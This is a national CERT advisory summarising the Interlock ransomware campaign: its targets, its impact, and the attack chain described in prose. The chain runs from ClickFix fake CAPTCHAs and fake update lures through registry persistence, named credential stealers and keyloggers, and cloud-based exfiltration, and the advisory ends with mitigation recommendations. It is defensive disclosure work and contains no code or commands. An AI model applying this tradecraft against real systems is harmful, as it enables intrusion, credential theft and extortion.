Cyber999 Advisories

1.0 Introduction

The Interlock ransomware variant was first observed in late September 2024, targeting various businesses and critical infrastructure across organisations in North America and Europe. According to a joint advisory released by the FBI, CISA, HHS, and MS-ISAC, these actors target their victims based on opportunity, and their activity is financially motivated. Interlock actors have been observed using uncommon initial access methods, via drive-by downloads from compromised legitimate websites and the ClickFix social engineering technique, which tricks users into executing malicious payloads disguised as system fixes. The ransomware is capable of encrypting virtual machines (VMs) on both Windows and Linux platforms, with the threat actors employing a variety of tactics for discovery, credential access, and lateral movement within networks.

2.0 Impact
Interlock ransomware can cause severe disruption by encrypting critical systems and exfiltrating sensitive data. It targets virtualised environments across Windows, Linux, and FreeBSD platforms. Victims risk operational downtime, financial losses, and reputational damage, especially if stolen data is publicly leaked. The absence of an initial ransom demand adds uncertainty, while the threat actors often follow through on threats to expose data if payments are not made. 

3.0 Targets
Interlock ransomware primarily targets organisations across various North America and Europe sectors, focusing on entities that rely on virtualised environments. Affected industries include business enterprises, healthcare, education, and critical infrastructure. The actors conduct opportunistic attacks, exploiting exposed or vulnerable systems regardless of organisation size, and show particular interest in environments running Windows, Linux, and FreeBSD operating systems.

4.0 Technical Details

4.1 Initial Access

Interlock actors typically gain initial access through drive-by downloads hosted on compromised websites. Malicious payloads are often disguised as fake browser or software updates, such as Google Chrome, Microsoft Edge, or security software like FortiClient or Cisco AnyConnect. In some cases, the group has used the ClickFix technique, where users are deceived into running a fake CAPTCHA that executes Base64-encoded PowerShell commands, launching the attack without the user realising.

4.2 Execution And Persistence

Once inside the system, Interlock actors use a fake executable that functions as a remote access trojan (RAT) to execute PowerShell scripts that place malicious files in the Windows Startup folder, allowing persistence on user login. They also modify Windows Registry run keys using PowerShell to ensure the malware continues running across reboots. These actions are disguised under legitimate-sounding names like “Chrome Updater” to evade detection.

4.3 Reconnaissance

To gather intelligence on the infected system, Interlock actors use PowerShell scripts to execute system discovery commands. These include checking the current user identity, system configuration, active services, logical drives, and ARP cache entries. This information helps the attackers map the environment and plan further actions such as lateral movement or privilege escalation.

4.4 Command and Control (C2)

For command and control operations, Interlock actors rely on tools such as Cobalt Strike and SystemBC, along with their own Interlock RAT and NodeSnake RAT. These tools allow attackers to maintain remote access, issue commands, and coordinate post-compromise activity across the network.

4.5 Credential Access, Lateral Movement and Privilege Escalation

After establishing remote access, Interlock actors deploy credential-stealing tools like cht.exe and keyloggers like klg.dll, which record keystrokes into files named conhost.txt. They also use other information stealers such as Lumma and Berserk Stealer to collect credentials. The attackers move laterally using stolen credentials via Remote Desktop Protocol (RDP) or remote access tools like AnyDesk and PuTTY. In some cases, they have gained elevated privileges by compromising domain administrator accounts, possibly using Kerberoasting attacks.

4.6 Collection and Exfiltration

Before encryption, Interlock actors collect and exfiltrate data using tools like Azure Storage Explorer and AzCopy, uploading stolen data to cloud storage accounts. They also use file transfer applications such as WinSCP to exfiltrate data over FTP or SCP protocols. This exfiltrated data is then used as leverage in double extortion schemes.

5.0 Indicator of Compromise (IoCs)

Table 1: File-Based (SHA-256)

Table 2: File-Based IOCs (SHA-1)

Table 3: Tools Used by Interlock Actors

6.0 MITRE ATT&CK Tactics and Techniques

7.0 Recommendation

CyberSecurity Malaysia advises that system administrators implement the following mitigations to strengthen defenses against Interlock ransomware and similar threats. These recommendations are aligned with global best practices and the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and NIST.

For more information, please refer to the official advisory: 

https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a?utm_source=Interlock&utm_medium=GovDelivery

7.1 Recommendations for System Administrators

• Implement Domain Name System (DNS) filtering to block access to malicious websites.
• Deploy web access firewalls to prevent command injection and unauthorized access.
• Train users to recognize and report phishing and social engineering attempts.
• Disable hyperlinks in emails and add banners to emails received from external sources.
• Develop and maintain a recovery plan with encrypted, offline, and immutable backups stored separately from production systems.
• Enforce strong password policies in compliance with NIST standards; use long passwords and avoid frequent forced resets.
• Require multi-factor authentication (MFA) for access to email, VPNs, and critical systems.
• Apply identity, credential, and access management (ICAM) policies organization-wide.
• Use time-based access controls (e.g., Just-in-Time access) for privileged accounts.
• Ensure all operating systems, applications, and firmware are regularly updated and patched.
• Prioritize patching known exploited vulnerabilities in internet-facing services.
• Deploy endpoint detection and response (EDR) tools across virtual machines, endpoints, and servers.
• Monitor network activity with tools capable of detecting abnormal and lateral movement behavior.
• Filter inbound network traffic to block access from untrusted or unknown sources.
• Install, enable, and regularly update antivirus and anti-malware software with real-time protection.
• Segment networks to contain the spread of malware and restrict lateral movement.
• Disable unused ports and unnecessary services on all systems.
• Regularly review and audit user accounts, especially those with administrative privileges.
• Apply the principle of least privilege to all user and system accounts.
• Restrict or turn off command-line and scripting capabilities (e.g., PowerShell, CMD) where not needed.
• Maintain frequent backups and regularly test restoration procedures.
• Ensure all backups are encrypted, immutable, and cover the entire data infrastructure.

For further enquiries or incident reporting, please get in touch with Cyber999 through the following channels:

8.0 References

• https://www.cisa.gov/news-events/alerts/2025/07/22/joint-advisory-issued-protecting-against-interlock-ransomware
• https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a?utm_source=Interlock&utm_medium=GovDelivery
• https://www.cisa.gov/sites/default/files/2025-07/aa25-203a-stopransomware-interlock-072225.pdf
• https://www.cisa.gov/sites/default/files/2025-07/AA25-203A-interlock-stix.xml
• https://www.cisa.gov/sites/default/files/2025-07/AA25-203A-interlock-stix.json
• https://www.cisa.gov/stopransomware